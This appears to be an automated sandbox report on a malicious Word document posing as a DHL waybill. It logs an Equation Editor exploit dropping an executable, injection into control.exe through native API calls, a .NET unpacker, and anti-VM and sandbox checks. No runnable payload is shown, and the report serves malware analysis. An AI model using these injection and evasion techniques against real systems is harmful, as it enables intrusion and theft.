Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1010C NtOpenDirectoryObject,	8_2_01E1010C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E110D0 NtOpenProcessToken,	8_2_01E110D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E10060 NtQuerySection,	8_2_01E10060
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E10078 NtResumeThread,	8_2_01E10078
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E10048 NtProtectVirtualMemory,	8_2_01E10048
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E11930 NtSetContextThread,	8_2_01E11930
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0F938 NtWriteFile,	8_2_01E0F938
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0F8CC NtWaitForSingleObject,	8_2_01E0F8CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FBE8 NtQueryVirtualMemory,	8_2_01E0FBE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FA50 NtEnumerateValueKey,	8_2_01E0FA50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FA20 NtQueryInformationFile,	8_2_01E0FA20
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E11D80 NtSuspendThread,	8_2_01E11D80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FD5C NtEnumerateKey,	8_2_01E0FD5C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FC90 NtUnmapViewOfSection,	8_2_01E0FC90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E10C40 NtGetContextThread,	8_2_01E10C40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FC48 NtSetInformationFile,	8_2_01E0FC48
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FC30 NtOpenProcess,	8_2_01E0FC30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FFFC NtCreateProcessEx,	8_2_01E0FFFC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FF34 NtQueueApcThread,	8_2_01E0FF34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FEA0 NtReadVirtualMemory,	8_2_01E0FEA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FE24 NtWriteVirtualMemory,	8_2_01E0FE24
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_001185F0 NtCreateFile,	8_2_001185F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_001186A0 NtReadFile,	8_2_001186A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00118720 NtClose,	8_2_00118720
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_001187D0 NtAllocateVirtualMemory,	8_2_001187D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011871B NtClose,	8_2_0011871B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_001187CA NtAllocateVirtualMemory,	8_2_001187CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D56A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	8_2_01D56A82
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D56F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	8_2_01D56F06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D56F12 NtQueryInformationProcess,	8_2_01D56F12

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

OLE indicator has summary info: false

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: hkdf.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: LaXgQ8hib9fwKQI[1].bat.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Dhl Waybill Document.doc	Virustotal: Detection: 28%
Source: Dhl Waybill Document.doc	ReversingLabs: Detection: 35%

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$l Waybill Document.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD8E0.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/9@11/11

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\hkdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: control.pdb source: hkdf.exe, 00000006.00000002.461953910.00000000008B9000.00000004.00000020.sdmp, hkdf.exe, 00000006.00000002.461764308.0000000000430000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: hkdf.exe, hkdf.exe, 00000006.00000003.423197452.0000000000440000.00000004.00000001.sdmp, hkdf.exe, 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, hkdf.exe, 00000006.00000003.422167039.0000000000240000.00000004.00000001.sdmp, hkdf.exe, 00000006.00000002.462162594.0000000000B20000.00000040.00000001.sdmp, control.exe

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: hkdf.exe.2.dr, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: LaXgQ8hib9fwKQI[1].bat.2.dr, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.hkdf.exe.13e0000.0.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.hkdf.exe.13e0000.1.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hkdf.exe.13e0000.2.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hkdf.exe.13e0000.4.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hkdf.exe.13e0000.0.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hkdf.exe.13e0000.1.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.hkdf.exe.13e0000.0.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hkdf.exe.13e0000.3.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.hkdf.exe.13e0000.1.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.hkdf.exe.13e0000.0.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.hkdf.exe.13e0000.10.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.hkdf.exe.13e0000.3.unpack, DispatchChannelSi/SiteMembershipConditi.cs	.Net Code: M85 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_013E6D6F pushfd ; retf	4_2_013E6D80
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_013E45F3 push edi; iretd	4_2_013E4604
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B99DF1 push es; retn 0000h	4_2_00B99DF2
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B99E41 push es; retn 0000h	4_2_00B99E42
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B9B728 push ss; retn 0000h	4_2_00B9B72A
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 5_2_013E6D6F pushfd ; retf	5_2_013E6D80
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 5_2_013E45F3 push edi; iretd	5_2_013E4604
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041B842 push eax; ret	6_2_0041B848
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041B84B push eax; ret	6_2_0041B8B2
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041B8AC push eax; ret	6_2_0041B8B2
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00416151 push edx; iretd	6_2_00416170
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041546E push eax; iretd	6_2_00415470
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00415D83 push ds; iretd	6_2_00415DCF
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00414EEC push esi; retf	6_2_00414EF2
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00415F41 push cs; ret	6_2_00415F50
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00414F2D push ebx; retf	6_2_00414F2E
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041B7F5 push eax; ret	6_2_0041B848
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009BDFA1 push ecx; ret	6_2_009BDFB4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1DFA1 push ecx; ret	8_2_01E1DFB4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00116151 push edx; iretd	8_2_00116170
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011546E push eax; iretd	8_2_00115470
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011B7F5 push eax; ret	8_2_0011B848
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011B842 push eax; ret	8_2_0011B848
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011B84B push eax; ret	8_2_0011B8B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011B8AC push eax; ret	8_2_0011B8B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00115D83 push ds; iretd	8_2_00115DCF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00114EEC push esi; retf	8_2_00114EF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00114F2D push ebx; retf	8_2_00114F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011BF5E pushfd ; ret	8_2_0011BF5F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00115F41 push cs; ret	8_2_00115F50

Source: initial sample	Static PE information: section name: .text entropy: 7.95549041822
Source: initial sample	Static PE information: section name: .text entropy: 7.95549041822

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LaXgQ8hib9fwKQI[1].bat

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LaXgQ8hib9fwKQI[1].bat			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hkdf.exe			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

Stream path '_1701084789/\x1Ole10Native' entropy: 7.99569090431 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hkdf.exe PID: 3004, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\hkdf.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000108614 second address: 000000000010861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000001089AE second address: 00000000001089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1188	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe TID: 2796	Thread sleep time: -40905s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe TID: 1724	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe TID: 1704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2864	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 2212	Thread sleep time: -46000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Code function: 6_2_004088E0 rdtsc

6_2_004088E0

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

